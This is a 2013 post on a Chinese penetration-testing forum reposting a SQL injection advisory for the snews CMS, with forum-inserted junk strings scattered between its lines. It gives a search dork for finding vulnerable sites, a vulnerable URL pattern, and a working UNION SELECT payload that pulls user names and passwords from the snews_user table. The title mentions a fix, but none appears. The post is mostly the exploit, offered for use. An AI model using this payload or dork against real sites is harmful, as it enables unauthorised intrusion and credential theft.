中国网络渗透测试联盟
标题:
CMS snews SQL注射及修复
[打印本页]
作者:
admin
时间:
2013-1-23 08:55
标题:
CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability
! a$ p( P% [7 j+ X
作者: By onestree
6 B5 z" z& w, d4 E( x9 y- O9 K
下载地址 :
http://snewscms.com/
' q s4 m; i$ L. |; h2 v
测试平台 : ubuntu 12.10 / win 7
& o4 P* A u3 n4 ]
关键词: inurl:"tanyakan pada rumput yang bergoyang"
7 p: [1 @4 i/ ]2 Z
" Q0 w7 a+ P' t- Q$ Z
- e9 C* v5 m n
*************************************************************
0 k I5 t$ r( R6 [' X5 \( L
$ j. J0 e. V) q- ]
SQL poc:
% D$ z3 b, r6 ?5 z
1 x) R1 M9 I: [8 |0 c6 U
http://www.2cto.com
/snews/snews.php?act=shownews&id=[SQL]
* U$ c i: v7 h. N; ^4 ]/ ]
% i' H$ D4 W+ ]9 m, R0 D0 c$ a$ Q
示例
1 a+ j. Z6 N7 q
. q! v3 j: L3 C
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
0 r2 W; G8 ]) F$ I! V0 }" x8 U( D
! L" G& V0 v( `
0 a# h2 L5 `" d' {: D* G8 `; ]
致谢:
5 G% \9 ]4 H% B4 c' A
4 ], k, V7 [- _
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
t" r' E6 F9 }% W$ ^. O
- O. F, r, b0 T) `* n0 X- u) R# E$ p! ~
indonesiancoder - moeslimh4x0r - go-coder
K" J4 I; Z7 ]6 S1 f( p1 C
, s5 M: z- M. b# l! U$ {! Y i
spesial my hunny :*
9 C9 |5 Z7 V, i' M* T
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2